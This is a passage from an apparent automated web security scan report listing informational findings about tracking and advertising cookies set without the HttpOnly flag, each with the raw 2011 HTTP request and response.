Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|60203|56835|56987|56761|56681|50213|56780|56232|50220|56768; expires=Thu, 03-May-12 13:59:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde,00a1aa9458d8a100f3797a835d7de998; expires=Thu, 03-May-12 13:59:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NjAyMDM6NTY4MzU6NTY5ODc6NTY3NjE6NTY2ODE=; expires=Thu, 03-May-12 13:59:49 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Tue, 10-May-11 13:59:49 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 321
Content-Type: application/x-javascript
Content-Length: 321

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|57094|54243|50961|54209|
...[SNIP]...

10.121. http://tag.contextweb.com/TagPublish/getad.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2555
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:02 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:02 GMT; path=/
Set-Cookie: 536156_4_101378=1304949602182; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524833886248|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:02 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...

10.122. http://tags.bluekai.com/site/2731

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2731

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2731 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bklc=4dc7f363; bk=c6b/zCA+ZqtVIHOf; bkc=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; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101DfI4ByU9WiUOgD=; bkst=KJh5Dn+v96WD7u/QZ1x/kAvyLcHC775ZyY/hgkWCCniSDLALL66QvznrigP4WvpLHHeaH+OYa1PcSI1lVBQ/agqmgANy3LB8z1b59g35HrT572bNYrMKTuADed3eRE3GoDImK7eD/Q3JJxyEbfWKiEyK23u7kzHKO901i9it9/lzddM7j8RvTBSE0CiwHNjTOCwy+ePVVRD8ReqIrceI+XkvDzkV4ek3eMsJ9EHkU9GiZ99Z2sfohLZPTAHimDI6i7ZYWb6GO0Goa09JOPUn8zBi5rnL6gweHyTF/Blof/4qqHsF6TtKUm7poO7xxW1z+jrMRnUhDfN0lCw77DKBrCdTgVTcIlsb8VdvDqycoob1ygPCwh2DnZU+Vu+EQ/ZZPY3lQ3Mh8fZE3tVWuiC+V8wVedCm6AlYfN4cF8KpJHJ9s1WaJ+H2/XjsH0WOjqMHRxuC4gZI5BbpZUXldyJRfc9I; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 14:00:12 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 10 May 2011 14:00:12 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=h3IyWOA+ZqtVIHOf; expires=Sat, 05-Nov-2011 14:00:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=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; expires=Sat, 05-Nov-2011 14:00:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 14:00:12 GMT; path=/; domain=.bluekai.com
BK-Server: 9936
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

10.123. http://tags.bluekai.com/site/3358

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3358

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3358?id=wOebwAz4UvVv HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bkst=KJh5DeNny69RF3WQtBxvMAJhzeHy7Id5QRmNh3oxuGNtPcgCLCESGuxHjl2OzU/UHHxUxx5HacPtXEzTrni8KGknXSSc8Tw7KSIWf3KHK057eb6uK7HTYiVedZYRePS0a6z2mVGHHzxuCG7NVRdWwG2b6+5vRMXsOAqWOar9HraddF1puyPyb6+kM12Mvl0eY4MSs3rLyCyysl2Km4dfjvVG8irIcEVcZ1x9ZM/rOHa19OBbpf+pzgDXAPQrW3N0AKOWvX3OuLGauWJOgHE0DEAdzUqoNKaMChKxf7xmGottueqGjAIr277SesZG/R7qpPsTNFiolEMF34wmG6R2Y/BV+TmeJBLm+rxGtx5EE64HIgO4evoTKUFK0CHQGiZP036QSFhNbKHSOuWwjVNgLFGCl6tf3UKKgd3G8WLAQeYYY60GI6S1MRTM9LoyGb1R/FNtKItXapwdqFTan/CFAy==; bk=iklbKCA+ZqtVIHOf; bkc=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

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 14:00:04 GMT
Set-Cookie: bklc=4dc7f364; expires=Wed, 11-May-2011 14:00:04 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 10 May 2011 14:00:04 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=c6b/zCA+ZqtVIHOf; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=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; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101Df84ByU9WiqOgR=; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5Dn+v96WD7u/QZ1x/kAvyLcHC775ZyY/hgkWCCniSDLZLL66QvznrigP4WvpLHHeaH+OYa1PcSI1lVBQ/agqmgG6TNKWXmm5m95N1/FKmEZ8qOUE7X9uvOdlO1OlD6A5clE+3cGUWWGSJ2PiwHOTwK2nEuZ/F9QjsH9HqQWqr4dMN16Lazm+JjRpc/0LXQykTtC3gg1/z1Ord7pFdb22vDzkV4eo3OMsJ9EHkU9GiZ99Z2cqotLZPTodWRo8Ga41WJNoHekHunA9uY33V0y4af1EoCuKcehtKxfgEtxLlt0JKoVL2r5E7uEmQQRRTSM5cyUnMrlgoF14mmTLS5EdyV26m2rB6yNIUGlQcEe6jCuFe4MbGU1gSLNSZ9OBB3PHrOPcMMp17PXL/kPeS+iS+fdm+oJFL4g6Td3tznjW9yQQr1vcrspWtmQGJv1mBei1/24wPC4mKEFtfIx5jnl9d; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 14:00:04 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

10.124. http://tap.rubiconproject.com/oz/sensor

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/sensor?p=rubicon&pc=8201/13264&cd=false&xt=19&k=shakin'+stevens:144,irish+times:136,n+kane:104,sufjan+stevens:104,siobh+n:104,stevens:74,irish+time:68,computer+screen:64,reflects+order:64,play+reflects:64,stevens+plays:64,war+photographer's:64,s+grid:64,photographer's+world:64,dublin+s:64,harding+s:64,grid+play:64,s+olympia:64,screen+near:64,shop+around:64,car+finance:64,plays+dublin:64,war+photographer:52,stevens+realise:40,health+problems:40,shows+can:40,shakin'+steven:40,can+expect:40,1980s+janet:40,dublin+shows:40,janet+jackson:40,recent+health:40,upcoming+dublin:40,mid+1980s:40,prince+vibe:40,made+sufjan:40,frail+gift:40,tells+siobh:40,problems+made:40,irish:38,&t=Shakin'+Stevens+-+The+Irish+Times+-+Fri,+May+06,+2011 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; xdp_ti="2 May 2011 12:48:41 GMT"; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; dq=25|7|18|0; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk15=0; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7856/12590; rdk2=0; ses2=12590^2&13549^1; csi2=3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 204 No Content
Date: Mon, 09 May 2011 14:07:04 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 08-May-2012 14:07:04 GMT; Path=/
Set-Cookie: dq=26|7|19|0; Expires=Tue, 08-May-2012 14:07:04 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


10.125. http://trgca.opt.fimserve.com/fp.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trgca.opt.fimserve.com
Path:   /fp.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fp.gif?pixelid=287-036699&diresu=154dab7990adc1d6f3372c12 HTTP/1.1
Host: trgca.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; ssrtb=0; UI="2a8dbca1b98673a117|79973.9.-5.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; LO=00Oj63Jim1.00GK000h0W3NTAEE0; TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 43
Server: PR/1.4.0.0/0.7.61
P3P: policyref="http://www.fimserve.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Date: Mon, 09 May 2011 14:01:09 GMT
Connection: close
Set-Cookie: TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=; domain=.fimserve.com; path=/; expires= Wednesday, 22-Apr-2020 12:22:20 GMT

GIF89a.............!.......,...........L..;

10.126. http://va.px.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?key=segment&pixelID=57145&partner_uid=&partnerID=115 HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuH4/o1ZgFHi/7P571gUGDX+H1/4jsWA0QLM55LhmH0DJPscKts+fwFYFsznEuFYeZYVKNv5vQ0oy6DBYMBgwQAUvXeAVYBJYsuFX2+RRa98ZgGqXY8m+gooyiTxbNEPFNEV80HmTu47jSK68z7ILbPmr0WIAgA1izvV"; 
io_freq_p1="eJzjEudY4CLAJPH/2fx3LAoMGgwGTBbPQWwuYY6rEQKMEp3f26ASDBYMQMH1rkDVWy78eosseDxQgFliPZrgtlCg9sl9p1EE97oABWfNX4sQBACAmCKB"; dp_rec="{\"1\": 1304340350+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304340362+ \"4\": 1304340367}"

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:05:46 GMT
Set-Cookie: segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiJz7A2TcRBUg88VuZqChO4E27rp3BGgoEwcHUGpjMVDqyQWQ1SfBut/uBum78B3EPnQERM4Eizf/B5n0jwPIbAIz9/sBmRf3guRe7gORa/czAgAW/EAt";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 08-May-2012 14:05:46 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1268638&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


10.127. http://west.thomson.com/VendorFeeds/Alvendify/AlvendaImpression.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /VendorFeeds/Alvendify/AlvendaImpression.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /VendorFeeds/Alvendify/AlvendaImpression.aspx?storeId=RubiconRemarketing_ThomsonReuters HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; userName=6T3tjQn4ak8MTT5wHhGAoQ%3d%3d; LastKnownSiteId=1; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303850887310%27%5D%2C%5B%27Referrers%27%2C%271303859618330%27%5D%2C%5B%27Referrers%27%2C%271304026008789%27%5D%2C%5B%27Referrers%27%2C%271304553717621%27%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:53 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: ASP.NET_SessionId=gscizvtkj1igc3awnyt43zpc; path=/; HttpOnly
Set-Cookie: s_id=gscizvtkj1igc3awnyt43zpc; path=/
Set-Cookie: Alvendified=widgetId=RubiconRemarketing_ThomsonReuters&Impression=RubiconRemarketing_ThomsonReuters&Expansion=&PromCode=636051L46432&FirstImpression=5/9/2011 9:06:53 AM&ImpressionDomain0=167.68.225.189; expires=Wed, 08-Jun-2011 14:06:53 GMT; path=/
Cache-Control: private
Content-Type: image/jpeg
Content-Length: 631

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222..........."..............................
...[SNIP]...

10.128. http://www.burstbeacon.com/view/103170/64948/182030/318088/3050/2D1A28EF/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstbeacon.com
Path:   /view/103170/64948/182030/318088/3050/2D1A28EF/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /view/103170/64948/182030/318088/3050/2D1A28EF/ HTTP/1.1
Host: www.burstbeacon.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:03 GMT
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: /BC=V0GMw0P_d0jsN1H9100mQ25BB; path=/; expires=Mon, 08-Aug-2011 14:01:03 GMT
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.129. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

Issue detail

